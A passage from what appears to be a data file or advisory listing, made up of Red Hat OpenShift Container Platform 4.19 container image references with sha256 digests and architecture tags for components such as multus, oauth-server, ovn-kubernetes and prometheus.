"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c2c1f73f4ec1f7b91ebfc39a4282dddae2978a79150523a9c72748f50f7a2d89_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:47155911d2fc258d338ee6971d5690c24a02b6c7bb3606bab4b1901824db1f6b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:6723f26e9ad3469461e1f752819e048f819faef9cbebb6ed473d08f41393256f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:7c52ab73261a98a2c979547424a9a29519b147c8bcde814b3efbdc7ace885be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:b91171b9f56b994aa3bf574862cedd318db66039a1cdfb08798ee1700c0f956a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:4050f629b8d4af401707a5e0122a155bd110b6f80937a2e0cd3791a49b1deaeb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:77abdb2ebd4daa3e500f44aa6f65cd365dbc2d9d8874ca4793b9ee1a8b944b8e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:9ebe024a4484b52a59f1ed5c92db62b86e3709fc642983799ef49d2d9d8cd7ec_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a165973ac17958695bfe213fd4a651bb94bbd0e851fe81e97c8fe833300d8d31_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:3ab735360773e6eb8e7f35088cb7420de0b815a84ca87a9135a6cf19e97b5c93_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:97b3af6976324a521b0a6e615ce422f05dc3acee1885726abf447166939821c5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7f620ae9d70339b97b0719a725d8a8f398367238cfe33f312a1f0ef82afefcb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:d3cd466c6704a6f1aba413cf5cad5f551e71953adf3c0780011a60f72b4c81a7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:29e144f0cf3a9851b940809050df06a72bf01ad62938e8951b67aab956d6befe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d17917fccd90b94767a9a92d871bb54204568272946691755015410ae7c8084a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d8cbcc5fa3ec11a2abfe5f86bb1144c2682a34774a4f87db9dc4fc0691915c41_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eab489c24877c7868a6784cbf9534ed80125a1c4e88e1d31677ff028450d941c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:4c6d93338edf2c6e6633a530fcec5519e33b51c1c0e07558402d3aa52ef5c925_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:9b2dc7a7bf2ccc373348d47cb745507d6aae379b8b57c1ff828656476dd325c2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:aa29e3416d8bbb38417774faedd53058276393c5bd24d90bb6fcba42c60f7945_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:d2bb57710fa4b6bce2a2166507328563a79221a93e3b785652c75b10464980ab_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:581e5388025562d1814b612378873f26e27e84cb4a23a657d7a915cb02dff621_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b46c8f78db81e2da8ae6ab8bb08319ea90ef4cdc815c0aa87c45a706a4cfc0f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:6427aad3aec21c9f1b9b9ad6c93785247972ead44380069d38e446a79d1b1f2b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:d23fed56ef3bfaa7b89f21cba6063cc700b6b73eebb6fb3d98077c3335dfd9fd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:05dd72d920e18f245f13a436659250ffebd4acaa3bc8ac2a1387b2059af7bb7f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:2bc055a3ef3095325cc3d8d95d6c5149e6e34586e79bb8091dd89d6c2e546c72_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:85a930f0612b1fa7d455550a04666b723bb4402fec82481abf505a3f7c791526_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:c3ce5331bb023bea2bb1be11730cc3582c8de4dd8f22ed52fd531ceade69be2c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:16b454a5f9768dbfb1e51f32054bf46338c89f3ee1e9828362d3f340641c8209_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:84c26c0c2915619709a25cc9d5965f87517b6e5e15ee88b377bf45d9655d3d43_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:8f08a5275631222beb361db97e56b9be7ef24f2b8c98cb0de0efbbb844d339c6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:d6c3459d4243d17f867d3f2a40f8f82a176597b85e49b4fb131181de4c417286_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:898fde5963557880b3823bd46af8088248cb445cbe8909c8bbfe47e7887540a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:8ed88897f9c69a7018486d849e324d21da24df8f2597618f4e3ec9a5a9b7c211_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:ce9de5a46ede5b462a95a069d3e69e0944b51d0b65e8b557a5e41819978c502e_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e605c6228fb3a17648d4bf831c60b34032c000e625f232c2c841652b12ec56b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:446e5456c05c7d2bec67d89593839412d80fb3ed2d3187999ad35cbe4bef6254_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:ca13dacb50b72ce0a37639571e4725f447d773735f4ddd1eb787842184c6d16c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f4c5709aaed3be1c656067ba0a6f6a9c6612ac5044a9f659762cbfd8ac999f2f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f716b95f7c71d7c19652b152f542d31dc4afe25e49f303853a764aef57036215_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:79ccd40e05ae0921c4d5b53ecbbd84872bd5321c5af2db3e2336aa6a133d147c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:ea20d945814432b378647144a1bd5b9d86817d313afc11344780b85b3c3bc978_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:0a47f4c9013d8952c47ee25b3bd65fcb7f456cfb22d3604427eae1ea640a3b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:8471d6d7d895f46fb2a5d47003f30b9912bc364b7c9e968f3f956a30892039c3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:aa4e3baa62b954b5b608720705840545d15fd13a10f9f7559f388a0baa23b43b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:bb5b559822cbc33606bf85ce2f250ca390d32abdd72a3366264178cf96d9350f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:1f2e291faed6c919022e0aeb99da4937c21c9ea21f1d32f2012a1a9d090b35f1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:43691966b7a2bccfce36dabe72471924a9c5b36bac8e92dd34607d1216572064_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:c16d64bc9641e60f11486d22e0d1625024f11cc66a2ee4ea5bc28f3658e8cb72_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:d98ec7aa0c573d9a727fd30afb7844e7b70e380a8e2f81f57c58702858a73bbf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:46535766ac9cf5891d27f9ff7e0f237e6da936ec70eda335feb0daa7792be0a6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7943825a48e79ead36af88aaf9d6f391ffe9e7a0f975cad8022cb013e87bbc3d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7a634a90a2588298e8ae069655793200319b64fcd8f597a28ccdcfd7cbccfec3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:8325d7f01b4c91298b30264af086d7478d85d04f4427469c6bcfd9cd4e2ca8da_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:23a38593785b8a77c82fe981e8218363e58b55273e8d66b0dde4503627f891ba_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3414c5c5e88fc6e70cc1dc9db2f61bbd8200440983b0f7f538a323432e7ba6ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:cc214669704ff3c6bb09cecaf60a1f48f1110faa5db2fa08ecf43728318d315c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:d735e0c9269659f018b79543fb8bb04999139219635252d624516c48d32f87a1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:5e97a541ac477608c7ab93fdabd1ce26464278d04dbb60a41e9444648926b5ed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:66dd0ff7ebdf89393607ed43af70c5b19d7d062c4715dedde645cf7cf00042c6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6d0d678b8e234b026b11de75091fe5869edf76484325380a0bc2ea40d316828f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:72fc95856ec7db8a502bf2b09972d63f50671593a26366a9aa56d6153459fb79_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:35588ff05b4c23c28da38abaed98e46da42e24899bc6fe6b40508a77706a4a6b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:46bfd97dc7a9ceec42f309d5bc112e6eb8212b96278d70b5e67d4fd2f40170b7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:5015658d5bee0ff943bc69525816e23d34ca35ec3a818cf0130d58c8baea98b6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:560aafed0881129dc2e59d0639cf2924f25ecfc9b4104b9a9700c0ece0693a76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:2497f36ad41776147768069c63bab22f639770328273f69ef16473d41ce32278_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:269715c1fc118c5a352bb9a221e648f2fa24caabc0ae874d906e2947837b6a9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5a81fa31d2a53a7942e433df47983d0a9b17a3be01dc73802698a26c5a54557b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5f6089d286cfa67bcf24b6860c840e503fe431f8df8557324d9fae2725ee6f0d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:82412b7cf5683fb7a70749370015ea212339356d0443143e70ba439aba6d0b0f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:8e9affb2924d2c993f50e4baa132d3e3ddb4f1012154a80d9bf9114bddb10e49_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:9bb0d3806c90ff845c4dbe11678a15f2816a902e9fde4df463f3e85febdcfd8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:d14dd6230f53078a6cf0d3b1528d0d22995add08578ab3da323a4ff92d13cc31_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:6f971e62173e3772bc6c474b3f796d93ef9f01e1d098705177f06a82f56601b9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:988ab0315395f8580b26df4a0ebc13f53d47dd4bfb4160489f1d24c3c118c795_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:a51c6200b8f5a73c29e236c1a4ff59b61b54fe200fbed5f13d54583ea7f8f51e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:fc80f86e06eb2cc0fd6de0eebe896533169eb85bdd15e54b7b6a8e8722d3cf34_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:2d02a78de1b38dd1aa1159bffade3aaba19ee6ddf8b3a8f2b4a017cb2a6ea22e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3f3e0469a0d159c94ffc5063f08fa8af255d1e620b359264211b196cb330eb4e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:55f9b85e57f11e221edf4e30d65037caedd69a0a4d37d560d99225b992aa1cbb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:dbce78ed2734d0a9d61b3404fdcc6f4541b8dc5b95e4fb40b8f9157b002b2681_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:39dc4401c0fe4bdac4a4d5ff18880f92ce0cbf10e00208a564a50973ff2667b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:50613490849c11ce84b306bf77e8fd0e2d5e8e74d0db805f1dd73e7877a3d8a4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:a0fa55daf82f32ede8a24f467db6f6591c5f5810f3dfa4c5b095fe5ba8274595_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d17159405d993d6f0e812b36fc09809ae821807eadd5b9f1d448f4f188bd0e73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:1de5b7823150dabafe0ca7d026012a02e03da9f95ebab9389d84f82c4fb83dc7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:b12d8b79849779424f3cffd8ff8da719904dadb5cdb018f0056f39b3ccb593f8_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:cba950803b92bd6bd4edf5f6e4c6f6f92cc899132e530d2508d142deeb9366cd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:d5c61e25f1e62aab1c6a521f4184d3552fe23d82e3a080124bf8e38d4b2ba2cd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:68a9cd133540eed3257ca2d5fa6f8ef384c3f66cc3cb4a30c72228c3450bce49_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:92a4f2142815522fdeee0f26ed1841cb16c10ab93ec38512f64ce82a81a12bb6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e80c61f3f591b4a682b352c787e1715f7d9f4f06e209ef8dc82e41b8bded9b8e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:f5f04cf85a80bba86be83c2fdd946e2efe511959a0ff382620bb9f7aa25b8c71_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:920a0d0905c6decac8fa8ae599192003df5391c6672f6c6f5eec3b6d9a8e0fee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a247fbc173026dc90407f375b79904dc8d29daecacd96333fa6ef80b3186e8eb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a97b0c4ab3e8716aadd8773aac0e95cb23aaaf6b618a2f759a1a53ecf078345f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:fc7191fca813048d552379742516176d723b1b1616dd53dd5ac557d117437c7a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2848880f87cf2488a841e371c990a81b83e44e08e7e4b1599c2009f078080d85_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:5ec6c4b928751540b436763b99127acafab69b5dfc867cd4cf74871697327698_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:730d5918dbf2f364e8528b6c8036541fbbee9e81c1bd5f6985f87b4602bc4579_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:9fe8545ad96791b55050941f86c99eef5b8b88b927c0e1953ce3ee703b6bf525_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:233b4ee8499922834ec87e62c2d4f322062f8063c99a95010bcf817e6114af6e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:337f863c631718a87bb7c6f86491aab519c0885ab1fe4184dd33df493da56386_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:350c76802bc5210c06f8ee9ac9a4a7f2474505132c1eab2607bfab309f59e5f3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:43aa5f0fe9244c1aaf3912b184ffee644522a2ff3bd3aadd53db5b90b0c93c76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:28f0a87cf08f7f9134bbe4ca64a7bc38a8882ecb5c8c6d57d5bb8f9096cdb76b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:4a986e828ec8120aa34ff2e35fe51c1866af855ea48e21d41aaeddcb4563a5d7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:8fc1c4e8704ed03a5515293ed3b18f9cf2f72b57bf97f6f646f0c4b7dfd47d65_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:c8a812560939b0a79d1b687f36dd5c5b71d01bea059b07e3652b35678884d330_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:515b6d09bed60aa703612507005248bbda01c940605101e93897805a7f1e4666_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:b36db241db3e48fdc932865032dbedaf9d94816523648f4345f19acba26cd7f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e8b6d45610b94825d1f5525443529e99a5e68441a8f331e20746614a606dc475_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:f3405b744680f7e937609958ff100453abb5a7cff06344997be0b0a7b7fa29e3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0df3b71023897418a185bfc7a38f4f67e0a41b6733452fefd59c9d7edbec3df6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:49afa7e1da94ce712c27df4a3e01d4748b2a493b4c61527a8a895c24e3001648_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:afbb2ca0948d8280647626e33064e6fc0d72310244cd69e338efdcc1b1ea7c8b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:e689a8391301d7ce3ba922d5fee8624e5d7f9c7a23905f78a7171d9a182d3f1c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:93ddc3e527257964b98d041a3d830c1be67f8c781f93d562c328c1dee7b37ef1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:97611bba51f02868cd922555e6c8e75d7eb4b5d8a865a69fd957084f897a5033_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:3a47a587be70333ba3719bb416fb04c176e41ce27d2c051b1210717857fd9b92_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:d48293acc1ecfd8e08eed3f47d3c37eb9d5905642a04e12ed26434a222ed0476_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:25f2667e3ce28ce5f0326be23f78cc6eedd523d4d2cdcfee2c02565d14d16ec2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:ec8e975cdae392efc948e02d0a30b98809739aff380a856ec97e0367fd1d0179_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:70ec66ac0b28bc34120378d962fdfe8a2f2411591611eaf6df7d4e62b8076a7f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:cc3b4055bc35dcc6c701bca3092202adbdbf5edefe3737167475ee2431fc30c1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2b9e95c24afe6cdf775027984310e0388433100034ef17e8de50160370019063_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:47e0ce843654534a810ad00a3b0703d8abbf4b8f221c479bae47cceed4d944e1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:6c081df14b51b5bffaaf126426c8919de0821a460c3a7ec80abf95581b749609_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:7f52c583cdba43b214630766d8f050b322c936307f28e1951b47d2fdecd11acb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:470582fb21bf68d82be5cb2548bb4fd55827624330297d62b246a69b831153cd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:a362b4e6bd7979c2413fe2bed3f66be4a44508bf397115caa539fa0857e26527_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:c0935ced156f72b3a6a77ff11445c038bd0555d881b73c760c7291cc7d27749b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:f434571500312f9a43f76fb244efb3184388fa6c34e955228612364918c8f1c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5fa811100ce565454ba1e243b9d0b94ca6f9f630fe159d4a7de104eb844039e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:a40105662b9188d283206418a2884182a9aff74c2cf4f700df3bd69443773d8c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:bde91bb377421a028e30bb830721f120be505c245717b5e2a3e25e5e6754bd5a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:e4ca2b3866c381b5fbbf8f6be7f9a34f4dd86ef1f952624e28760ce20ca3be64_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:07c0eed66aca1eed3b7897a24d97c00cb77f592f9b6900c7fb2644b4cfae6797_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:399d1be8fdde89d24d645044e04a0f5c0c105629896692c5e856a69d1bc6b076_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:62e2f95a2e6d53f00bfed8b866c40378bfb1219b72ba6b4e9478d4753fcfa623_arm64",
